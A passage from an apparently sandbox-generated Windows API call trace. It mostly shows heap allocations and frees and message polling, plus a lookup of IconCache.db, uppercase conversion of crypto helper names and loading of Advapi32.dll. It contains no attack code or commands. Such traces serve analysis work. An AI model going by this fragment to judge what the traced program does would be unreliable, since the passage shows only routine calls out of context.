dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0242.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0242.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0242.648] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0242.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0242.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0242.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0242.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0242.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0242.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0242.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0242.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0242.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0242.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0242.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0242.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0242.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0242.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0242.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0242.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0242.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0242.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0242.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0242.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0242.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0242.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0242.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0242.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0242.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0242.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0242.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0242.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0242.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0242.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0242.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0242.649] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0242.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0242.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0242.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0242.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0242.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0242.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0242.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0242.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0242.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0242.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0242.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0242.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0242.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0242.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54828 | out: hHeap=0x970000) returned 1 [0242.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0242.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0242.652] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0242.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0242.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0242.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0242.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0242.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0242.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0242.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0242.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0242.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0242.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0242.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0242.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0242.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0242.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0242.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0242.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0242.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0242.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0242.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0242.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0242.652] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/IconCache.db", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4a3b706e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x4a3b706e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd2e85042, ftLastWriteTime.dwHighDateTime=0x1d5e7c2, nFileSizeHigh=0x0, nFileSizeLow=0x13441, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 0xa87250 [0242.653] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0242.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0242.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0242.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0242.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0242.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0242.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0242.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0242.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0242.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0242.653] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0242.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0242.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0242.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0242.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0242.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0242.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0242.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0242.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0242.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0242.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0242.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0242.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0242.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0242.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0242.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0242.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0242.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0242.654] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0242.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0242.654] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0242.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0242.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0242.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e30 [0242.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0242.654] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0242.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0242.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04690 [0242.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0242.654] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0242.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04690 | out: hHeap=0x970000) returned 1 [0242.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0242.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0242.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0242.654] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0242.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0242.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0242.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0242.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0242.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0242.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0242.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0242.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0242.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0242.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0242.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0242.655] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0242.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0242.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0242.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0242.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0242.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0242.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0242.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0242.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0242.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0242.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0242.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0242.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0242.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0242.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0242.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0242.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0242.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0242.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0242.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0242.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0242.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0242.656] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0242.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0242.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0242.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0242.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0242.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0242.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0242.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0242.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0242.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0242.656] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0242.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0242.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0242.656] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0242.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0242.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0242.656] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0242.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0242.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0242.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0242.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0242.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0242.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0242.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0242.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0242.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0242.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0242.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0242.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0242.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0242.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0242.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0242.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0242.657] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0242.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0242.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0242.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0242.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0242.657] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0242.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0242.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0242.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0242.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0242.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0242.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0242.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0242.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0242.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0242.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0242.658] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0242.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0242.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0242.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0242.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0242.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0242.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0242.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0242.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0242.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0242.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0242.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0242.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0242.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0242.658] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0242.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0242.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0242.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0242.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0242.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0242.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0242.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0242.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0242.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0242.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0242.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0242.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0242.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0242.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0242.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0242.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0242.659] HeapFree (in: hHeap=0x970000, 